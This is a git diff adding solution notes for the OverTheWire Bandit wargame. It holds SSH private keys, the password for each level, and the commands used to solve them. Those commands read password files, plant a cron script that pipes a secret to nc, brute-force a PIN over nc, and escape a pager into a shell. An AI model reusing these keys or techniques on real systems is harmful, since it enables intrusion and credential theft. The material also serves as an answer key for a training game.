OverTheWire

overthewire/bandit/keys/id_bandit14

@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpAIBAAKCAQEAxkkOE83W2cOT7IWhFc9aPaaQmQDdgzuXCv+ppZHa++buSkN+
+gg0tcr7Fw8NLGa5+Uzec2rEg0WmeevB13AIoYp0MZyETq46t+jk9puNwZwIt9XgB
+ZufGtZEwWbFWw/vVLNwOXBe4UWStGRWzgPpEeSv5Tb1VjLZIBdGphTIK22Amz6Zb
+ThMsiMnyJafEwJ/T8PQO3myS91vUHEuoOMAzoUID4kN0MEZ3+XahyK0HJVq68KsV
+ObefXG1vvA3GAJ29kxJaqvRfgYnqZryWN7w3CHjNU4c/2Jkp+n8L0SnxaNA+WYA7
+jiPyTF0is8uzMlYQ4l1Lzh/8/MpvhCQF8r22dwIDAQABAoIBAQC6dWBjhyEOzjeA
+J3j/RWmap9M5zfJ/wb2bfidNpwbB8rsJ4sZIDZQ7XuIh4LfygoAQSS+bBw3RXvzE
+pvJt3SmU8hIDuLsCjL1VnBY5pY7Bju8g8aR/3FyjyNAqx/TLfzlLYfOu7i9Jet67
+xAh0tONG/u8FB5I3LAI2Vp6OviwvdWeC4nOxCthldpuPKNLA8rmMMVRTKQ+7T2VS
+nXmwYckKUcUgzoVSpiNZaS0zUDypdpy2+tRH3MQa5kqN1YKjvF8RC47woOYCktsD
+o3FFpGNFec9Taa3Msy+DfQQhHKZFKIL3bJDONtmrVvtYK40/yeU4aZ/HA2DQzwhe
+ol1AfiEhAoGBAOnVjosBkm7sblK+n4IEwPxs8sOmhPnTDUy5WGrpSCrXOmsVIBUf
+laL3ZGLx3xCIwtCnEucB9DvN2HZkupc/h6hTKUYLqXuyLD8njTrbRhLgbC9QrKrS
+M1F2fSTxVqPtZDlDMwjNR04xHA/fKh8bXXyTMqOHNJTHHNhbh3McdURjAoGBANkU
+1hqfnw7+aXncJ9bjysr1ZWbqOE5Nd8AFgfwaKuGTTVX2NsUQnCMWdOp+wFak40JH
+PKWkJNdBG+ex0H9JNQsTK3X5PBMAS8AfX0GrKeuwKWA6erytVTqjOfLYcdp5+z9s
+8DtVCxDuVsM+i4X8UqIGOlvGbtKEVokHPFXP1q/dAoGAcHg5YX7WEehCgCYTzpO+
+xysX8ScM2qS6xuZ3MqUWAxUWkh7NGZvhe0sGy9iOdANzwKw7mUUFViaCMR/t54W1
+GC83sOs3D7n5Mj8x3NdO8xFit7dT9a245TvaoYQ7KgmqpSg/ScKCw4c3eiLava+J
+3btnJeSIU+8ZXq9XjPRpKwUCgYA7z6LiOQKxNeXH3qHXcnHok855maUj5fJNpPbY
+iDkyZ8ySF8GlcFsky8Yw6fWCqfG3zDrohJ5l9JmEsBh7SadkwsZhvecQcS9t4vby
+9/8X4jS0P8ibfcKS4nBP+dT81kkkg5Z5MohXBORA7VWx+ACohcDEkprsQ+w32xeD
+qT1EvQKBgQDKm8ws2ByvSUVs9GjTilCajFqLJ0eVYzRPaY6f++Gv/UVfAPV4c+S0
+kAWpXbv5tbkkzbS0eaLPTKgLzavXtQoTtKwrjpolHKIHUz6Wu+n4abfAIRFubOdN
+/+aLoRQ0yBDRbdXMsZN/jvY44eM+xRLdRVyMmdPtP8belRi2E2aEzA==
+-----END RSA PRIVATE KEY-----

overthewire/bandit/keys/id_bandit14.pub

@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGSQ4TzdbZw5PshaEVz1o9ppCZAN2DO5cK/6mlkdr75u5KQ36CDS1yvsXDw0sZrn5TN5zasSDRaZ568HXcAihinQxnIROrjq36OT2m43BnAi31eAFm58a1kTBZsVbD+9Us3A5cF7hRZK0ZFbOA+kR5K/lNvVWMtkgF0amFMgrbYCbPpltOEyyIyfIlp8TAn9Pw9A7ebJL3W9QcS6g4wDOhQgPiQ3QwRnf5dqHIrQclWrrwqxU5t59cbW+8DcYAnb2TElqq9F+BiepmvJY3vDcIeM1Thz/YmSn6fwvRKfFo0D5ZgDuOI/JMXSKzy7MyVhDiXUvOH/z8ym+EJAXyvbZ3

overthewire/bandit/keys/id_bandit17

@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
+imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
+Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
+DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
+JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
+x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
+KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
+J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
+d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
+YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
+vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
++TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
+8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
+SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
+HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
+SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
+R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
+Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
+R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
+L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
+blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
+YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
+77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
+dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3
+vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=
+-----END RSA PRIVATE KEY-----

overthewire/bandit/keys/id_bandit26

@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpQIBAAKCAQEApis2AuoooEqeYWamtwX2k5z9uU1Afl2F8VyXQqbv/LTrIwdW
+pTfaeRHXzr0Y0a5Oe3GB/+W2+PReif+bPZlzTY1XFwpk+DiHk1kmL0moEW8HJuT9
+/5XbnpjSzn0eEAfFax2OcopjrzVqdBJQerkj0puv3UXY07AskgkyD5XepwGAlJOG
+xZsMq1oZqQ0W29aBtfykuGie2bxroRjuAPrYM4o3MMmtlNE5fC4G9Ihq0eq73MDi
+1ze6d2jIGce873qxn308BA2qhRPJNEbnPev5gI+5tU+UxebW8KLbk0EhoXB953Ix
+3lgOIrT9Y6skRjsMSFmC6WN/O7ovu8QzGqxdywIDAQABAoIBAAaXoETtVT9GtpHW
+qLaKHgYtLEO1tOFOhInWyolyZgL4inuRRva3CIvVEWK6TcnDyIlNL4MfcerehwGi
+il4fQFvLR7E6UFcopvhJiSJHIcvPQ9FfNFR3dYcNOQ/IFvE73bEqMwSISPwiel6w
+e1DjF3C7jHaS1s9PJfWFN982aublL/yLbJP+ou3ifdljS7QzjWZA8NRiMwmBGPIh
+Yq8weR3jIVQl3ndEYxO7Cr/wXXebZwlP6CPZb67rBy0jg+366mxQbDZIwZYEaUME
+zY5izFclr/kKj4s7NTRkC76Yx+rTNP5+BX+JT+rgz5aoQq8ghMw43NYwxjXym/MX
+c8X8g0ECgYEA1crBUAR1gSkM+5mGjjoFLJKrFP+IhUHFh25qGI4Dcxxh1f3M53le
+wF1rkp5SJnHRFm9IW3gM1JoF0PQxI5aXHRGHphwPeKnsQ/xQBRWCeYpqTme9amJV
+tD3aDHkpIhYxkNxqol5gDCAt6tdFSxqPaNfdfsfaAOXiKGrQESUjIBcCgYEAxvmI
+2ROJsBXaiM4Iyg9hUpjZIn8TW2UlH76pojFG6/KBd1NcnW3fu0ZUU790wAu7QbbU
+i7pieeqCqSYcZsmkhnOvbdx54A6NNCR2btc+si6pDOe1jdsGdXISDRHFb9QxjZCj
+6xzWMNvb5n1yUb9w9nfN1PZzATfUsOV+Fy8CbG0CgYEAifkTLwfhqZyLk2huTSWm
+pzB0ltWfDpj22MNqVzR3h3d+sHLeJVjPzIe9396rF8KGdNsWsGlWpnJMZKDjgZsz
+JQBmMc6UMYRARVP1dIKANN4eY0FSHfEebHcqXLho0mXOUTXe37DWfZza5V9Oify3
+JquBd8uUptW1Ue41H4t/ErsCgYEArc5FYtF1QXIlfcDz3oUGz16itUZpgzlb71nd
+1cbTm8EupCwWR5I1j+IEQU+JTUQyI1nwWcnKwZI+5kBbKNJUu/mLsRyY/UXYxEZh
+ibrNklm94373kV1US/0DlZUDcQba7jz9Yp/C3dT/RlwoIw5mP3UxQCizFspNKOSe
+euPeaxUCgYEAntklXwBbokgdDup/u/3ms5Lb/bm22zDOCg2HrlWQCqKEkWkAO6R5
+/Wwyqhp/wTl8VXjxWo+W+DmewGdPHGQQ5fFdqgpuQpGUq24YZS8m66v5ANBwd76t
+IZdtF5HXs2S5CADTwniUS5mX1HO9l5gUkk+h0cH5JnPtsMCnAUM+BRY=
+-----END RSA PRIVATE KEY-----

overthewire/bandit/keys/id_bandit26.pub

@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmKzYC6iigSp5hZqa3BfaTnP25TUB+XYXxXJdCpu/8tOsjB1alN9p5EdfOvRjRrk57cYH/5bb49F6J/5s9mXNNjVcXCmT4OIeTWSYvSagRbwcm5P3/lduemNLOfR4QB8VrHY5yimOvNWp0ElB6uSPSm6/dRdjTsCySCTIPld6nAYCUk4bFmwyrWhmpDRbb1oG1/KS4aJ7ZvGuhGO4A+tgzijcwya2U0Tl8Lgb0iGrR6rvcwOLXN7p3aMgZx7zverGffTwEDaqFE8k0Ruc96/mAj7m1T5TF5tbwotuTQSGhcH3ncjHeWA4itP1jqyRGOwxIWYLpY387ui+7xDMarF3L

overthewire/bandit/passwords.md

@@ -0,0 +1,159 @@
+bandit0: bandit0
+bandit1: ZjLjTmM6FvvyRnrb2rfNWOZOTa6ip5If
+	`cat readme`
+bandit2: 263JGJPfgU6LtdEvgfWU1XP5yac29mFx
+	`cat ./-`
+bandit3: MNk8KNH3Usiio41PRUEoDFPqfxLPlSmx
+bandit4: 2WmrDFRmJIq3IPxneAaMGhap0pFhF3NJ
+bandit5: 4oQYVPkxZOOEOO5pTW81FB8j8lxXGUQw
+bandit6: HWasnPhtq9AVKe0dmk45nxy20cvUa6EG
+	`find inhere/ -type f -print 2>/dev/null | xargs -d '\n' ls -l | grep 1033`
+bandit7: morbNTDkSW6jIlUc0ymOdMaLnOlFVAaj
+	`cat $(find / -type f -user bandit7 -group bandit6 2>/dev/null)`
+bandit8: dfwvzFQi4mU0wfNbFOe9RoWskMLg7eEc
+	`<data.txt grep millionth`
+bandit9: 4CKMh1JI91bUIZZPXDqGanal4xvAg0JM
+	`sort data.txt | uniq -u`
+bandit10: FGUW5ilLVJrxX9kMYMmlN4MgbpfMiqey
+	`strings data.txt | grep "^=="`
+bandit11: dtR173fZKb0RRsDFSGsg2RWnpNVj3qRr
+	`cat data.txt | base64 -d`
+bandit12: 7x16WNeHIi5YkIhWsfFIqoognUTyj9Q4
+	`<data.txt tr 'A-Za-z' 'N-ZA-Mn-za-m'`
+bandit13: FO5dwFsc0cbaIiH0h8J2eUks2vdTDwAn
+	```bash
+	#!/usr/bin/env bash
+	set -e
+	WORKING=$(mktemp -d)
+	xxd -r ~/data.txt $WORKING/data.bin
+	# then run `tar xf`, `gzip -d`, `bzip2 -d` a million times
+	```
+bandit14: MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS
+	```bash
+	#!/usr/bin/env bash
+	KEY="./id_bandit14"
+	scp -P 2220 bandit13@bandit.labs.overthewire.org:~/sshkey.private $KEY
+	ssh-keygen -y -f $KEY > "$KEY.pub"
+	chmod 600 $KEY*
+	# login with private key
+	ssh bandit14@bandit.labs.overthewire.org -p 2220 -i ./id_bandit14
+	# >>> echo /etc/bandit_pass/bandit14
+	```
+bandit15: 8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo
+	`echo "MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS" | nc localhost 30000`
+bandit16: kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx
+	`openssl s_client -connect localhost:30001`
+bandit17: STORED IN `keys/id_bandit17*`
+	```bash
+	# get all open ports
+	nmap localhost -T5 -p31000-32000 
+		| grep open 
+		| awk '{print substr($1, 1, 5)}'
+	```
+bandit18: x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO
+	`diff passwords.old passwords.new`
+bandit19: cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8
+	`ssh bandit19@bandit.labs.overthewire.org -p 2220 -t /bin/sh`
+bandit20: 0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO
+	`./bandit20-do cat /etc/bandit_pass/bandit20`
+bandit21: EeoULMCra2q0dSkYj561DX7s1CpBuOBt
+	```
+	tmux new -s imbaud
+	# Ctrl-b + "
+	BOX=$(mktemp) && echo "0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO" > $BOX && <$BOX nc -l -p 5555
+	# Ctrl-b + o
+	~/suconnect 5555
+	```
+bandit22: tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q
+	`/etc/cron.d/cronjob_bandit22` references binary `/usr/bin/cronjob_bandit22.sh`
+	which complains about bad privileges for `/tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv`
+	then cat out the temp file and BOOM
+bandit23: 0Zf11ioIjMVN551jX3CmStKLYqjk54Ga
+	Similar solution to previous one with `/etc/cron.d/cronjob_bandit23`
+	`cat /tmp/$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1)`
+bandit24: gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8
+	```bash
+	# terminal 1:
+	nc -l -p 5555
+	# terminal 2:
+	echo -e "#\!/bin/bash\ncat /etc/bandit_pass/bandit24 
+		| nc localhost 5555" > /var/spool/bandit24/foo/gibme
+	```
+bandit25: iCi86ttT4KSNe1armKiwbQNmB3YJP3q4
+	'''bash
+	python3 -c "from itertools import product; [print(''.join(D)) for D in product((str(x) for x in range(10)), repeat=4)]" 
+		| xargs -L1 echo "gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8" 
+		| nc localhost 30002 
+		| grep -v "Wrong"
+	'''
+bandit26: s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ
+	First copy the private key from bandit25's home
+	Then `cat /etc/passwd | grep bandit26` to find what shell bandit26 uses:
+	# bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
+	`cat /usr/bin/showtext` to see it runs the `more` pager then exits.
+	`more` will enter "command" mode if the terminal window is too small
+	to view the paged contents, which allows us to run the `v` command
+	which opens the content in vim instead. Next, do `:set shell=/bin/bash`
+	and then run vim's `:shell` to GTFO
+		
+bandit27: upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB
+	From bandit26 in bash: `./bandit27-do cat /etc/bandit_pass/bandit27`
+bandit28: Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN
+	```bash
+	BOX=$(mktemp -d); echo $BOX
+	git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo $BOX
+	# use same password as bandit27 login
+	cd $BOX
+	# then check README
+	```
+bandit29: 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7
+	Do same as bandit28 for `/home/bandit28-git/repo`, then:
+	`git show fb0df1358b1ff146f581651a84bae622353a71c0:README.md`
+bandit30: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL
+	Do what bandit29 did but then:
+	```bash
+	git branch -r # list all remote branches
+	git fetch --all
+	```
+bandit31: fb5S2xb7bRyFmAvQYQGEqsbhVyJqhnDy
+	Similar to bandit30 but use:
+	```bash
+	git tag
+	git show secret # show the "secret" tag	
+	```
+bandit32: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K
+	Simply `rm .gitignore` then `git add .; git commit -m "AHHHHH"; git push -u origin`
+bandit33: tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0
+	```bash
+	# use symbols since uppercase messes everything up
+	$0 # the shell runs  "sh <CMD>" so "sh $0" => "sh sh"
+	cat /etc/bandit_pass/bandit33
+	```
+
+```
+>>> bandit33@bandit:~/README.md <<<
+Congratulations on solving the last level of this game!
+
+At this moment, there are no more levels to play in this game. However, we are constantly working
+on new levels and will most likely expand this game with more levels soon.
+Keep an eye out for an announcement on our usual communication channels!
+In the meantime, you could play some of our other wargames.
+
+If you have an idea for an awesome new level, please let us know!
+``` 
+
+Learnings:
+```
+Connect over SSL/TLS (like telnet/nc does) using openssl:
+	`openssl s_client -connect HOST:PORT -quiet`
+	Note: commands starting with "k" will trigger "KEYUPDATE"
+		  run openssl with the `-quiet` flag to avoid this	
+	https://docs.openssl.org/3.0/man1/openssl-s_client/#connected-commands
+	
+The pager "more" goes into a command mode if the terminal is too small to display
+the content. Which allows us to run any command we want.
+
+Git:
+	git show <COMMIT>:file/path/here # print a file content at specific hash
+	git branch -r # list all branches stored on the remote
+```